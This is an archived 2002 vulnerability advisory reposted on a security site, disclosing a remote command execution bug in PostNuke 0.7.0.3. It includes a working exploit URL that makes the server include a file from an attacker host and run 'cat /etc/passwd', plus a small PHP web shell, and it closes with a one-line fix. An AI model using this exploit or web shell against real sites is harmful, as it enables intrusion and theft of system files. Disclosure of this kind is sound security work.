Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  CGI bugs

  Xpede many vulnerabilities

  CGIscript.net - csSearch.cgi - Remote Code Execution (up to 17,000 sites vulnerable)

  Instant Web Mail additional POP3 commands and mail headers

  Cookie vulnerability in Alguest guestbook (PHP)

From:pokleyzz sakamaniaka <pokleyzz_(at)_hotmail.com>
Date:28.03.2002
Subject:postnuke v 0.7.0.3 remote command execution



post nuke is one of popular content management

system written in php . there are bug in file user.php

line 107

which user can append $caselist array with their own

value.



foreach ($caselist as $k=>$v)

{

   $ModName = $v['module'];

   include "$v[path]/$k";

}

$caselist = array();



http://lame_host/user.php?caselist[bad_file.txt][path]

=http://bad_host&command=cat%20/etc/passwd



bad_file.txt (put in bad_host document root):



-- start bad_file.txt -----

<pre>

<?php

system($command);

?>

-- end bad_file.txt -----



quick fix:

put on line 28 :

$caselist = array();



http://inetd-secure.net/

http://www.mybsd.org.my/pokleyzz/

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 



Рейтинг@Mail.ru